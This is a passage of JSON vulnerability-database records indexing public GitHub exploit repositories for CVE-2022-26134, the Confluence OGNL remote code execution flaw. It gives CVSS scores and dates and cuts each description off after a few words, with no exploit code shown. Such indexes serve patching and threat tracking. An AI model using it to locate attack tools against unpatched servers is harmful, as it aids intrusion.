"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-06-02T15:24:55", "id": "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:34:22", "description": "# CVE-2022-26134\n\n\n# links\n\n https://confluence.atlassian.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T08:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-14T18:47:54", "id": "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:29:56", "description": "# CVE-2022-26134 by 1vere$k\nJust simple PoC for the Atlassian Ji...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-15T10:06:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-04-11T18:37:11", "id": "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:29:57", "description": "## This is a Script to find vulnerable servers to CVE-2022-26134...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T05:34:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-11T20:02:19", "id": "F42BF447-C1A3-5795-8343-D71F096AFF52", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:30:05", "description": "# Atlassian Confluence OGNL Injection POC Vulnerability CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-06T01:27:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T16:53:31", "id": "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:30:32", "description": "\n\n### CVE-2022...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T04:30:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-05-14T01:00:37", "id": "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:30:47", "description": "# CVE-2022-26134 - conFLU\n\nPoC for exploiting CVE-2022-26134 on ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T17:33:18", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T17:34:07", "id": "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-11T15:36:59", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T01:25:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-11T14:56:46", "id": "464D6B41-AE5F-5E93-BD26-6E6C8E9F80BC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-06T09:08:50", "description": "<h1 align=\"center\">Serein | \u8eab\u5904\u843d\u96e8\u7684\u9ec4\u660f</h1> \n<p align=\"center\"><im...", "cvss3": {}, "published": "2022-05-31T07:44:01", "type": "githubexploit", "title": "Exploit for CVE-2022-26134", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T09:02:20", "id": "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-08-23T20:11:29", "description": "# 0DAYEXPLOITAtlassianConfluenceCVE-2022-26134\n\nCVE-2022-26134 -...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T19:59:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-23T17:24:50", "id": "66468422-89C0-5AC8-9CEA-6B512338FF7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:56", "description": "# CVE-2022-26134-POC\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T18:32:35", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:59", "id": "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:23:37", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T21:26:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-27T23:21:17", "id": "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:23:45", "description": "# Confluence Pre-Auth Remote Code Execution via OGNL Injection (...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T20:24:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-27T23:19:44", "id": "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:33", "description": "# Atlassian Confluence \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f(CVE-2022-26134)\nFoFa\uff1atitle=\"Con...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T07:54:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T08:02:12", "id": "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-11T08:26:03", "description": "# BotCon\nAttlasian Confluence Un-Authenticated Remote Code Execu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-11T07:50:57", "id": "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-25T02:18:51", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T21:07:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-24T23:43:54", "id": "8F6AEAF4-2161-55F7-96CB-003251BDC309", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T18:02:22", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T13:02:10", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T03:47:11", "id": "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:16:27", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-14T01:28:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-14T10:35:04", "id": "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T02:21:40", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T11:55:37", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T22:41:05", "id": "469B060E-C585-599E-A0D1-AD5D186F70FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:12:10", "description": "# CVE-2022-26134\n\n> \u7ec3\u4e60 go \u5199 poc\n\n## \u7528\u6cd5\n```bash\ngo get -u -v gith...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-25T15:29:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-12-26T05:18:26", "id": "7C531491-7EB6-51AA-9072-F345BDB61AFD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T15:28:53", "description": "# CVE-2022-26134\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u5728\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u6784\u9020OGNL\u8868\u8fbe\u5f0f\u8fdb\u884c\u6ce8\u5165\uff0c\u5b9e\u73b0\u5728Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-23T14:38:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", 